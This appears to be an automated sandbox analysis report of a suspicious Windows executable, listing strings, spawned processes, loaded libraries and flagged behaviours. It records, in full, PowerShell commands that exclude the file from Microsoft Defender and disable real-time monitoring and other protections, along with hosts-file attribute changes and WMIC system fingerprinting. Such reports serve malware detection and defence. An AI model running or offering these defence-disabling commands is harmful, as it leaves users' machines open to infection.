              Source: file.exeString found in binary or memory: morebuf={pc:: no frame (sp=runtime: frame ts set in timertraceback stuckadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find RegCreateKeyExWRegDeleteValueWnot a valid URImenu-expand.svgcontent-add.svgcontent-cut.svgfolder-open.svgmedia-music.svgmedia-photo.svgmedia-video.svgmedia-pause.svgvolume-down.svgvolume-mute.svgcolorAchromaticmediaFastRewindfileApplication%-13s %q
              Source: file.exeString found in binary or memory: EOF: expected length: %d, got %dreading MorxSubtableLigature: %sreading OTKernSubtableHeader: %sunsupported CaretValue format %dreading ChainedContextualPos: %sreading TupleVariationHeader: %scharstring type %d not supportedinvalid operator %s in Font Dictinvalid custom charset format %dinvalid local subroutines offsetunsupported setjmp/longjmp usageinput overflows the modulus sizechacha20: invalid buffer overlapunsupported real number encodinghtmlindex: invalid encoding namefailed to lookup build executableFailed to parse user theme file: release of handle with refcount 0142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whence-DisableIntrusionPreventionSystemskip everything and stop the walkGetVolumeNameForVolumeMountPointWwaiting for unsupported file typeGODEBUG: no value specified for "pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qCould not parse fallback templatefailed to link OpenGL program:
              Source: file.exeString found in binary or memory: EOF: expected length: %d, got %dreading MorxSubtableLigature: %sreading OTKernSubtableHeader: %sunsupported CaretValue format %dreading ChainedContextualPos: %sreading TupleVariationHeader: %scharstring type %d not supportedinvalid operator %s in Font Dictinvalid custom charset format %dinvalid local subroutines offsetunsupported setjmp/longjmp usageinput overflows the modulus sizechacha20: invalid buffer overlapunsupported real number encodinghtmlindex: invalid encoding namefailed to lookup build executableFailed to parse user theme file: release of handle with refcount 0142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whence-DisableIntrusionPreventionSystemskip everything and stop the walkGetVolumeNameForVolumeMountPointWwaiting for unsupported file typeGODEBUG: no value specified for "pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qCould not parse fallback templatefailed to link OpenGL program:
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
              Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: opengl32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: glu32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dinput8.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: xinput1_4.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: file.exeStatic file information: File size 26987008 > 1048576
              Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x947c00
              Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x792200
              Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x876e00
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: section name: .xdata
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC36D2A5 pushad ; iretd 6_2_00007FFAAC36D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC5571C9 push ebx; retf 6_2_00007FFAAC5571CA

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Users\user\Desktop\file.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: attrib.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
